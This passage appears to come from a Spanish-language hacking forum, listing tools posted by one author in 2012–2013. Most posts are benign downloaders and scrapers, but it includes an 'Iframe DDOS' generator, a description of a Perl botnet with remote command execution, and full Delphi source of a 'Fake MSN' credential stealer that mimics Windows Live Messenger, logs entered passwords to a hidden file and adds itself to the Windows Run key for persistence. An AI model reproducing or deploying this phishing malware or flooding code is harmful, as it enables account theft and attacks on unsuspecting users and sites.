        hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

        BufferedReader nave = new BufferedReader(
                new InputStreamReader(hc.getInputStream()));

        while ((re = nave.readLine()) != null) {
            conte.append(re);
        }

        nave.close();

        return conte.toString();

    }
}

//The End ?

#213

Java / [Java] URL Shorter 0.1

Enero 11, 2013, 11:10:36 PM

Un simple programa para cortar urls.

Código: java


/**
 * URL Shorter 0.1
 * Coded By Doddy H
 */

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {
    public static void main(String[] args) throws Exception {
        
      String pagina;
      String re;
      
      Scanner host = new Scanner(System.in);
      System.out.println("\n\n-- == URL Shorter 0.1 == --\n\n");
      System.out.println("[+] Page : ");
      pagina = host.nextLine();

      URL cargar = new URL("http://tinyurl.com/api-create.php?url="+pagina);
      BufferedReader nave = new BufferedReader(
      new InputStreamReader(cargar.openStream()));

      while ((re = nave.readLine()) != null)
        System.out.println("\n[+] Link : "+re);
      nave.close();
   
      System.out.println("\n\n-- == Coded By Doddy H == --");
    }
}

/**
 * The End ? 
 */

#214

Java / [Java] Iframe DDOS

Enero 11, 2013, 11:10:29 PM

Un simple poc para iframe ddos.

Código: java


/**
 * Iframe DDOS 0.1
 * Coded By Doddy H
 */

import java.util.Scanner;
import java.net.*;
import java.io.*;

public class Main {
    public static void main(String[] args) throws IOException{

      String pagina;
      int cantidad;
      int y;

      FileOutputStream fos;
      DataOutputStream dos;

      Scanner host = new Scanner(System.in);
      System.out.println("\n\n-- == Iframe DDOS 0.1 == --\n\n");
      System.out.println("[+] Page : ");
      pagina = host.nextLine();
      System.out.println("[+] Count : ");
      cantidad = host.nextInt();

      FileWriter ar=new FileWriter("poc.html");
      BufferedWriter go=new BufferedWriter(ar);
      PrintWriter archivo=new PrintWriter(go);

      for (y=1;y<=cantidad;y++){
        archivo.println("<iframe src='"+pagina+"' width='3' height='3'></iframe><br>");
      }
      archivo.close();
      System.out.println("\n[+] All done ...");
      System.out.println("\n\n-- == Coded By Doddy H == --");
    }
}

/**
 * The End ?
 */

#215

Perl / El script navideño

Diciembre 24, 2012, 10:56:38 AM

Ja , como regalo de navidad les dejo el script navideño xDDD.

El codigo

Código: perl


#!usr/bin/perl
#El script navideño
#Coded By Doddy H

while(true) {

my($dia,$mes,$anio,$hora,$minutos,$segundos) = agarrate_la_hora();

unless($dia eq "25" and $mes eq "12") {
syswrite STDOUT,"[+] Fecha y hora : $dia/$mes/$anio $hora:$minutos:$segundos \r";
} else {
syswrite STDOUT,"\n\n[+] Feliz navidad !";
<stdin>;
exit(1); 
}

}

sub agarrate_la_hora {

my ($a,$b,$c,$d,$e,$f,$g,$h,$i) = localtime(time);

$f+= 1900;
$e++;

return($d,$e,$f,$c,$b,$a);

}

#The End ?

#216

Perl / [Perl Tk] Project DH Botnet 0.2

Diciembre 08, 2012, 10:12:26 AM

Bueno , siempre quize hacer una botnet en Perl , logre programar una bien basica que tiene las siguientes opciones :

Ejecucion de comandos
Simple GetIP
Listar procesos activos
Matar procesos
Listar archivos de un directorio
Borrar un archivo o directorio cualquiera
Leer archivos
Abrir y cerrar lectora
Ocultar y mostrar programas del escritorio
Ocultar y mostrar Taskbar
Mandar mensajitos molestos
Abrir Word y hacer que escriba solo (una idea muy grosa xDD)
Hacer que el teclado escriba solo
Volver loco al mouse haciendo que se mueva por la pantalla

Para usar esta botnet necesitan un hosting que permita PHP y Mysql.

Una imagen del generador :

Otra imagen de la botnet en accion :

El codigo lo pueden encontrar You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

#217

Perl / [Perl] SMF Manager 0.1

Diciembre 07, 2012, 03:03:58 PM

Traduccion a Perl ~~(mega buggeada)~~ del script que hizo Javier de PortalHacker para poder leer los mensajes privados y listar las categorias de un foro SMF.

El codigo

Código: perl


#!usr/bin/perl
#SMF Manager 0.00001
#Coded By Doddy H

#ppm install http://www.bribes.org/perl/ppm/HTML-Strip.ppd

use LWP::UserAgent;
use HTTP::Cookies;

use HTML::Strip;

my $nave = LWP::UserAgent->new(
    cookie_jar            => HTTP::Cookies->new(),
    requests_redirectable => [],
    timeout               => 5,
    agent =>
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);

print qq(
  @@@   @     @  @@@@@    @     @                                  
 @   @  @     @  @        @     @                                  
 @      @@   @@  @        @@   @@                                  
 @      @@   @@  @        @@   @@   @@@  @ @@   @@@   @@@@  @@@  @@
  @@@   @ @ @ @  @@@@     @ @ @ @      @ @@  @     @ @   @ @   @ @ 
     @  @ @ @ @  @        @ @ @ @   @@@@ @   @  @@@@ @   @ @@@@@ @ 
     @  @  @  @  @        @  @  @  @   @ @   @ @   @ @   @ @     @ 
 @   @  @  @  @  @        @  @  @  @   @ @   @ @   @ @   @ @   @ @ 
  @@@   @     @  @        @     @   @@@@ @   @  @@@@  @@@@  @@@  @ 
                                                         @         
                                                     @@@@          

);

print "\n\n[+] Page : ";
chomp( my $url = <stdin> );

print "\n[+] Username : ";
chomp( my $usera = <stdin> );

print "\n[+] Password : ";
chomp( my $passa = <stdin> );

## Login

print "\n[+] Connecting ....\n\n";

my $code = $nave->post(
    $url . "/index.php?action=login2",
    {
        "user"         => $usera,
        "passwrd"      => $passa,
        "cookielength" => "9000",
        "hash_passwrd" => "",
        "submit"       => "submit"
    }
);

if ( $code->is_redirect ) {

    #print $code->header('location'),"\n";
}
elsif ( $code->is_success ) {
    print $code->as_string, "\n";
}
else {
    print STDERR $code->status_line, "\n";
}

my $code = toma( $url . "/SSI.php?ssi_function=welcome" );

if ( $code =~ /Hola, <strong>(.*)<\/strong>/ ) {
    my $name = $1;
    print "[+] Welcome $name\n";
}
else {
    print "[-] Error\n";
}

##

while (1) {

    print "\n[+] Options\n\n";

    print "1 - See MP\n";
    print "2 - Navegate\n";
    print "3 - Exit\n";

    print "\n[+] Option : ";
    chomp( my $op = <stdin> );

    if ( $op eq "3" ) {
        exit(1);
    }

    if ( $op eq "1" ) {

        print qq(
 @     @  @@@@@ 
 @     @  @    @
 @@   @@  @    @
 @@   @@  @    @
 @ @ @ @  @@@@@ 
 @ @ @ @  @     
 @  @  @  @     
 @  @  @  @     
 @     @  @     

);

        mps($url);
    }

    if ( $op eq "2" ) {
        print qq(
 @    @                                        
 @@   @                                @       
 @@   @                                @       
 @ @  @   @@@  @   @  @@@   @@@@  @@@  @@  @@@ 
 @ @  @      @ @   @ @   @ @   @     @ @  @   @
 @  @ @   @@@@  @ @  @@@@@ @   @  @@@@ @  @@@@@
 @   @@  @   @  @ @  @     @   @ @   @ @  @    
 @   @@  @   @   @   @   @ @   @ @   @ @  @   @
 @    @   @@@@   @    @@@   @@@@  @@@@  @  @@@ 
                               @               
                           @@@@                


);

        my $chau2 = 0;

        while ( $chau2 eq 0 ) {

            print "\n[+] 1 - List Categories\n";
            print "[+] 2 - Exit\n";

            print "\n[+] Option : ";
            chomp( my $op = <stdin> );

            if ( $op eq "1" ) {

                print "\n[+] Searching ...\n\n";

                my $code = toma($url);

                while ( $code =~
/<a class=\"subject\" href=\"(.*?)\" name=(.*?)>(.*?)<\/a>/migs
                  )
                {
                    print "[+] ID : $2 [+] Name : $3\n";
                }

            }
            else {
                $chau2 = 1;
            }

        }

    }

}

#gets_list_mp();
#gets_msg_mp();
#gets_msg_now();

sub mps {

    my $url = shift;

    my $chau = "0";

    print "\n[+] Searching pages ..\n";

    my @founds = gets_list_mp($url);

    my $count = int(@founds);

    print "\n[+] Pages Found : $count\n";

    while ( $chau eq 0 ) {

        print "\n[+] 1 - Get List Messages\n";
        print "[+] 2 - Read Message\n";
        print "[+] 3 - Exit\n";

        print "\n[+] Option : ";
        chomp( my $op = <stdin> );

        if ( $op eq "1" ) {

            print "\n[+] Number Page : ";
            chomp( my $op = <stdin> );

            print "\n[+] Searching ..\n";

            gets_msg_mp( $founds[ $op - 1 ] );

        }
        elsif ( $op eq "2" ) {

            print "\n[+] Number Page : ";
            chomp( my $n = <stdin> );

            print "\n[+] ID : ";
            chomp( my $id = <stdin> );

            print "\n[+] Reading ...\n";

            gets_msg_now( $founds[ $n - 1 ], $id );

        }
        else {
            $chau = 1;
        }

    }
}

sub gets_msg_now {

    my $url = toma( $_[0] );

    my $id = "msg_" . $_[1];

    if ( $url =~ /<div class=\"inner\" id=\"$id\">(.*?)<\/div>/mig ) {

        my $uno = HTML::Strip->new( emit_spaces => 1 );
        my $final = $uno->parse($1);
        $final =~ s/^[\t\f ]+|[\t\f ]+$//mg;

        print "\n[START]\n\n";
        print $final;
        print "\n\n[END]\n\n";

    }

}

sub gets_msg_mp {

    my $url = toma( $_[0] );

    my @ids;
    my @asunto;
    my @nombre;

    while ( $url =~ /<td><a href=\"#msg(.*?)\">(.*?)<\/a><\/td>/migs ) {

        #print "$1 $2\n";
        push( @ids,    $1 );
        push( @asunto, $2 );
    }

    while ( $url =~ /Ver perfil de (.*?)">/migs ) {

        #print "$1\n\n";
        push( @nombre, $1 );
    }

    my $total = int(@ids) - 1;

    for my $num ( 0 .. $total ) {
        print "[+] ID : "
          . $ids[$num]
          . " [+] Asunto : "
          . $asunto[$num]
          . " [+] De : "
          . $nombre[$num] . "\n";
    }

}

sub gets_list_mp {

    my $url = shift;

    my @paginas;
    my $code = toma( $url . "/index.php?action=pm" );

    push( @paginas, $url . "/index.php?action=pm" );

    while ( $code =~ /<a class="navPages" href="(.*?)">(.*?)<\/a>/migs ) {
        push( @paginas, $1 );
    }

    my @paginas = repes(@paginas);

    return @paginas;

}

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

sub tomar {
    my ( $web, $var ) = @_;
    return $nave->post( $web, [ %{$var} ] )->content;
}

#The End ?

AVISO : Solo esta probado en el foro PortalHacker.

#218

Python / [Python] MP3 Downloader 0.1

Noviembre 28, 2012, 12:09:15 PM

Traduccion a Python de este simple script para buscar y bajar musica.

El codigo

Código: python


#!usr/bin/python
#MP3 Downloader 0.1
#Coded By Doddy H

import sys,urllib,urllib2,re,os,urlparse

def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()

def clean():
 if sys.platform=="win32":
  os.system("cls")
 else:
  os.system("clear")

def head():
 print """

 @     @  @@@@@   @@@     @@@@     @@@@  @         @ @    @
 @     @  @    @ @   @    @   @   @    @ @         @ @@   @
 @@   @@  @    @     @    @    @  @    @  @   @   @  @@   @
 @@   @@  @    @     @    @    @  @    @  @   @   @  @ @  @
 @ @ @ @  @@@@@    @@     @    @  @    @  @   @   @  @ @  @
 @ @ @ @  @          @    @    @  @    @   @ @ @ @   @  @ @
 @  @  @  @          @    @    @  @    @   @ @ @ @   @   @@
 @  @  @  @      @   @    @   @   @    @    @   @    @   @@
 @     @  @       @@@     @@@@     @@@@     @   @    @    @



                                          
                              Coded By Doddy H

                                       
"""

def copyright():
 print "\n\n(C) Doddy Hackman 2012\n"
 raw_input()
 sys.exit(1)

def proxar(a,b,c):
 sys.stdout.write("\r[+] Status : %s / %s" % (a * b,c))
  
def down(file,filesave):
 print "\n[+] File to download : "+filesave+"\n"
 try: 	
  urllib.urlretrieve(file,filesave,reporthook=proxar)
 except:
  print "\n[-] Error\n"
  copyright()
 print "\n\n[+] File Download in "+os.curdir+"/"+filesave

def buscar(titulo) : 

 songs = []
 datas =[]
 links = []
 datas_back = []
 links_back = []

 titulo = re.sub(" ","_",titulo)

 print "\n\n[+] Searching ...\n"

 code = toma("http://mp3skull.com/mp3/"+titulo+".html")

 if not (re.findall("Sorry, no results found for",code)):

  songs = re.findall("<div style=\"font-size:15px;\"><b>(.*)<\/b><\/div>",code)
  datas_back = re.findall("<!-- info mp3 here -->\s+(.*?)<\/div>",code)
  links_back = re.findall("<a href=\"(.*)\.mp3\"",code)

  for datac in datas_back : 
   datac = re.sub("<br />"," ",datac)
   datas.append(datac)

  for li in links_back : 
   lic = li+".mp3"
   links.append(lic)

  try:
   for counter in range(0,len(songs)):
    print "\n[Song "+str(counter)+"] : "+songs[counter]
    print "[Data] : "+datas[counter]
    print "[Link] : "+links[counter] 

  except:
   pass

  while 1:

   print "\n[+] Options\n"
   print "[+] 1 - Download"
   print "[+] 2 - Search"
   print "[+] 3 - Exit\n"

   op = raw_input("[+] Option : ")

   if op  == "3":
    print "\n\n[+] Finished\n"
    copyright()  

   if op == "2":
    party()

   if op == "1":
    num = input("\n[?] Number :")
    down(links[num],os.path.basename(links[num]))

 else:
  print "\n[-] Not Found\n";
  raw_input()
  party()

def party():

 clean()
 head()

 bs = raw_input("\n\n[?] Song : ")

 buscar(bs)

##

if not os.path.isdir("mp3_downloads"):
 os.makedirs("mp3_downloads")

os.chdir("mp3_downloads")

party()

##

#The End ?

#219

Perl / [Perl] MP3 Downloader 0.1

Noviembre 27, 2012, 11:57:04 AM

Hice este simple script para buscar y bajar musica.

El codigo

Código: perl


#!usr/bin/perl
#MP3 Downloader 0.1
#Coded By Doddy H

use LWP::UserAgent;
use URI::Split qw(uri_split);
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

my $se = "downloads_mp3";

unless ( -d $se ) {
    mkdir( $se, "777" );
}

chdir $se;

head();

print "[?] Song : ";
chomp( my $song = <stdin> );

$song =~ s/ /-/;

print "\n[+] Searching ...\n\n";

my $code = toma( "http://mp3skull.com/mp3/" . $song . ".html" );

chomp $code;

if ( $code =~ /Sorry, no results found for/ ) {
    print "\n[-] Not Found\n";
    copyright();
}

my @nombres;
my @datas;
my @links;

while ( $code =~ /<div style="font-size:15px;"><b>(.*)<\/b><\/div>/mig ) {
    my $nombre = $1;

    #print "name : $nombre\n";
    push( @nombres, $nombre );
}

while ( $code =~ /<!-- info mp3 here -->\s+(.*?)<\/div>/migs ) {
    my $data = $1;
    $data =~ s/<br \/>/ /;
    $data =~ s/<br \/>/ /;

    #print "data : $data\n";
    push( @datas, $data );
}

while ( $code =~ /<a href=\"(.*)\.mp3\"/mig ) {
    my $link = $1 . ".mp3";

    #print "link : $link\n";
    push( @links, $link );
}

my $encontrados = int(@nombres) - 1;

for my $aca ( 0 .. $encontrados ) {
    print "[Song $aca] : $nombres[$aca]\n";
    print "[Data] : $datas[$aca]\n";
    print "[Link] : $links[$aca]\n\n";
}

print "\n[?] Number : ";
chomp( my $number = <stdin> );

print "\n[+] Downloading ...\n";

now( $links[$number] );

print "\n[+] Finished\n";

copyright();

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#             MP3 Downloader 0.1              #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";

    marquesina(@logo);

    print "\n\n";

}

sub copyright {

    my @fin = ("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";
    marquesina(@fin);
    print "\n\n";

    <stdin>;

    exit(1);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub now {

    my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );

    if ( $path =~ /(.*)\/(.*)$/ ) {
        my $file = $2;
        if ( download( $_[0], $file ) ) {
        }
    }
}

sub download {
    if ( $nave->mirror( $_[0], $_[1] ) ) {
        if ( -f $_[1] ) {
            return true;
        }
    }
}

sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?

Un ejemplo de uso

Código: text



#=============================================#
#             MP3 Downloader 0.1              #
#---------------------------------------------#
# Written By Doddy H                          #
# Email: lepuke[at]hotmail[com]               #
# Website: doddyhackman.webcindario.com       #
#---------------------------------------------#
# The End ?                                   #
#=============================================#


[?] Song : bones now

[+] Searching ...

[Song 0] : Discovery Now - bionic bones mp3
[Data] : 256 kbps 1:30 2.79 mb
[Link] : http://www.whro.org/home/html/podcasts/discoverynow/041408.mp3

[Song 1] : Sean Bones - 'Here Now' mp3
[Data] : 128 kbps 3:28 3.19 mb
[Link] : http://serve.castfire.com/audio/878039/sean-bones-here-now_2012-02-23-1
74939.128.mp3

[Song 2] : Discovery Now - bionic bones mp3
[Data] : 256 kbps  00:01:30 2.8 mb
[Link] : http://whro.org/home/html/podcasts/discoverynow/041408.mp3

[Song 3] : Sean Bones - Here Now mp3
[Data] : 5.02 mb
[Link] : http://www.hulkshare.com/dl/4t42l4kxi811/sean_bones_-_here_now.mp3

[Song 4] : Fuego Ft. Amara - Lo Que Quiero (Prod. By Bones, Now & Laterz) (Www.S
tiloCaro.Com) mp3
[Data] : 4.43 mb
[Link] : http://www.hulkshare.com/dl/w86wxq8bl0n4/fuego_ft._amara_-_lo_que_quier
o_%28prod._by_bones%2c_now_%26_laterz%29.mp3

[Song 5] : Sean Bones - Here Now mp3
[Data] : 160 kbps 3:27 3.95 mb
[Link] : http://myspoonful.com/wp-content/uploads/Sean-Bones-Here-Now.mp3

[Song 6] : Frankie Bones - Bonesbreaks Vol. 2 (B2) On The Beat Now-freestyle na
veia mp3
[Data] : 4:40 mins 6.41 mb
[Link] : http://dc203.4shared.com/img/564370108/97ff8470/dlink__2Fdownload_2FS4X
eLchH_3Ftsid_3D20121127-94941-8934f180/preview.mp3


[?] Number : 1

[+] Downloading ...

[+] Finished


-- == (C) Doddy Hackman 2012 == --

#220

Perl / [Perl] FindIcons 0.1

Noviembre 25, 2012, 07:24:38 PM

Un simple script para bajar los iconos que quieran , los iconos bajados se guardan en un carpeta con el nombre buscado.

Código: perl


#!usr/bin/perl
#FindIcons 0.1
#Coded By Doddy H

use LWP::UserAgent;
use URI::Split qw(uri_split);
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

head();

print "[?] Search : ";
chomp( my $se = <stdin> );

$se =~ s/ /-/;

my $code = toma( "http://findicons.com/search/" . $se );

if ( $code =~ /<div class="box_info left">(.*)<\/div>/ ) {
    print "\n[+] $1\n";

    unless ( -d $se ) {
        mkdir( $se, "777" );
    }

    chdir $se;

}
else {
    print "\n[-] Not Found\n";
    copyright();
}

print "\n[?] Pages : ";

chomp( my $pages = <stdin> );

print "\n[+] Downloading ...\n\n";

for my $pages ( 1 .. $pages ) {

    my $code = toma("http://findicons.com/search/$se/$pages");

    while ( $code =~
        /<img src="http:\/\/png-(.*).findicons.com\/files\/(.*)" alt/mig )
    {
        my $link = "http://png-" . $1 . ".findicons.com/files/" . $2;

        now($link);

    }

}

print "[+] Finished ...\n";

copyright();

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#              FindIcons 0.1                  #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";

    marquesina(@logo);

    print "\n\n";

}

sub copyright {

    my @fin = ("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";
    marquesina(@fin);
    print "\n\n";

    <stdin>;

    exit(1);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub now {

    my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] );

    if ( $path =~ /(.*)\/(.*)$/ ) {
        my $file = $2;
        if ( download( $_[0], $file ) ) {
        }
    }
}

sub download {
    if ( $nave->mirror( $_[0], $_[1] ) ) {
        if ( -f $_[1] ) {
            return true;
        }
    }
}

sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?

#221

Delphi / [Delphi] Fake MSN 0.2

Noviembre 21, 2012, 02:18:20 PM

Aca les traigo la nueva version de este Fake MSN hecho en delphi.

Con las siguientes opciones :

El programa al cargarse se mueve automaticamente a la carpeta de windows
El programa se ejecuta cuando Windows se inicia
Se ocultan los archivos relacionados al programa

Con poner "doddy" en user y "hackman" en pass en el programa se cargan los logs ocultos

Una imagen

El codigo

Código: delphi


{
Fake MSN 0.2
Coded By Doddy H
}

unit fake;

interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
  Dialogs, jpeg, ExtCtrls, StdCtrls, Registry;

type
  TForm1 = class(TForm)
    Image1: TImage;
    Edit1: TEdit;
    Edit2: TEdit;
    Image2: TImage;
    procedure Edit1Click(Sender: TObject);
    procedure Edit2Click(Sender: TObject);
    procedure FormCreate(Sender: TObject);
    procedure Image2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.Edit1Click(Sender: TObject);
begin
  Edit1.Text := '';
end;

procedure TForm1.Edit2Click(Sender: TObject);
begin
  Edit2.Text := '';
  Edit2.PasswordChar := '*';
end;

procedure TForm1.FormCreate(Sender: TObject);

var nombrereal: string;
  rutareal: string;
  yalisto: string;
  her: TRegistry;

begin

  nombrereal := ExtractFileName(ParamStr(0));
  rutareal := ParamStr(0);
  yalisto := 'C:\WINDOWS\' + nombrereal;

  MoveFile(Pchar(rutareal), Pchar(yalisto));

  her := TRegistry.Create;
  her.RootKey := HKEY_LOCAL_MACHINE;

  her.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run', FALSE);
  her.WriteString('uber', yalisto);
  her.Free;

  SetFileAttributes(PChar(yalisto), FILE_ATTRIBUTE_HIDDEN);
  SetFileAttributes(PChar('C:/windows/datos.txt'), FILE_ATTRIBUTE_HIDDEN);

end;

procedure TForm1.Image2Click(Sender: TObject);

var archivo: TextFile;
  ruta: string;

begin

  if (Edit1.Text = 'doddy') and (Edit2.Text = 'hackman') then
  begin
    WinExec(PChar('notepad c:/windows/datos.txt'), SW_SHOW);
  end
  else
  begin

    if Edit1.Text = '' then
    begin
      ShowMessage('Escribe tu Id. de Window Live ID en este formato: tu [email protected]');
    end;
    if Edit2.Text = '' then
    begin
      ShowMessage('Escribe tu contraseña');
    end
    else
    begin
      if Edit2.Text = 'Escribe aqui tu contraseña' then
      begin
        ShowMessage('Escribe tu contraseña');
      end
      else
      begin
        ruta := 'c:/windows/datos.txt'; //mod
        if FileExists(ruta) then
        begin
          AssignFile(archivo, ruta);
          FileMode := fmOpenWrite;
          Append(archivo);
          Writeln(archivo, '[user] : ' + Edit1.Text + ' [password] : ' + Edit2.Text);
          CloseFile(archivo);
          Application.MessageBox('Se ha producido un error , es necesario reiniciar Window Live Messenger', 'Window Live Messenger', MB_OK);
          Form1.Close;
        end
        else
        begin
          AssignFile(archivo, ruta);
          FileMode := fmOpenWrite;
          ReWrite(archivo);
          Writeln(archivo, '[user] : ' + Edit1.Text + ' [password] : ' + Edit2.Text);
          CloseFile(archivo);
          Application.MessageBox('Se ha producido un error , es necesario reiniciar Window Live Messenger', 'Window Live Messenger', MB_OK);
          Form1.Close;
        end;
      end;
    end;
  end;

end;

end.

// The End ?

Si quieren bajar el proyecto + el programa compilado lo pueden hacer de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Cualquier sugerencia o error diganlo para mejorar (porque el programa en si no me convence xDD).

#222

Perl / [Perl] Counter Strike 1.6 Servers List

Noviembre 12, 2012, 07:32:11 PM

Lo mismo que el otro buscador pero esta vez para CS 1.6

El codigo

Código: perl


#!usr/bin/perl
#Counter Strike 1.6 Servers List
#Version 0.1
#Coded By Doddy H

use LWP::UserAgent;
use Cwd;
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

my @founds;
my @founds_final;

head();

print "[+] Pages (1-899) : ";
chomp( my $pag = <stdin> );

print "\n\n[+] Searching Servers ....\n";

for my $count ( 1 .. $pag ) {

    my $code =
      toma( "http://www.gametracker.com/search/cs/?searchipp=50&searchpge="
          . $count );

    my @found = $code =~ m/(\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}:\d+)/g;

    for (@found) {
        push( @founds_final, $_ );
    }

}

my @founds_final = repes(@founds_final);

print "\n[+] Servers Found : " . int(@founds_final);

my $ruta_logs = getcwd() . "/" . "cs_servers.txt";

if ( -f $ruta_logs ) {
    unlink($ruta_logs);
}

open( LOGS, ">>cs_servers.txt" );

for (@founds_final) {
    print LOGS $_ . "\n";
}

close LOGS;

print "\n\n[+] All results are stored in : $ruta_logs\n";

if ( -f $ruta_logs ) {
    system($ruta_logs);
}

copyright();

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#       Counter Strike 1.6 Servers List       #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";

    marquesina(@logo);

    print "\n\n";

}

sub copyright {

    my @fin = ("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";
    marquesina(@fin);
    print "\n\n";

    <stdin>;

    exit(1);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?

#223

Perl / [Perl] Half Life Servers List 0.1

Noviembre 12, 2012, 07:31:50 PM

Este script se encarga de buscar servers del juego Half Life para entrar y jugar , los resultados se guardan en un archivo de texto.

El codigo

Código: perl


#!usr/bin/perl
#Half Life Servers List 0.1
#Coded By Doddy H

use LWP::UserAgent;
use Cwd;
use Time::HiRes "usleep";

my $nave = LWP::UserAgent->new;
$nave->agent(
"Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"
);
$nave->timeout(5);

my @founds;
my @founds_final;

head();

print "[+] Searching Servers ....\n";

for my $count ( 1 .. 2 ) {

    my $code =
      toma( "http://www.game-monitor.com/search.php?game=valve&pg="
          . $count
          . "&num=100" );

    my @found = $code =~ m/(\d{1,3}[.]\d{1,3}[.]\d{1,3}[.]\d{1,3}:\d+)/g;

    for (@found) {
        push( @founds_final, $_ );
    }

}

my @founds_final = repes(@founds_final);

print "\n[+] Servers Found : " . int(@founds_final);

my $ruta_logs = getcwd() . "/" . "hl_servers.txt";

if ( -f $ruta_logs ) {
    unlink($ruta_logs);
}

open( LOGS, ">>hl_servers.txt" );

for (@founds_final) {
    print LOGS $_ . "\n";
}

close LOGS;

print "\n\n[+] All results are stored in : $ruta_logs\n";

if ( -f $ruta_logs ) {
    system($ruta_logs);
}

copyright();

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#         Half Life Servers List 0.1          #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";

    marquesina(@logo);

    print "\n\n";

}

sub copyright {

    my @fin = ("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";
    marquesina(@fin);
    print "\n\n";

    <stdin>;

    exit(1);

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
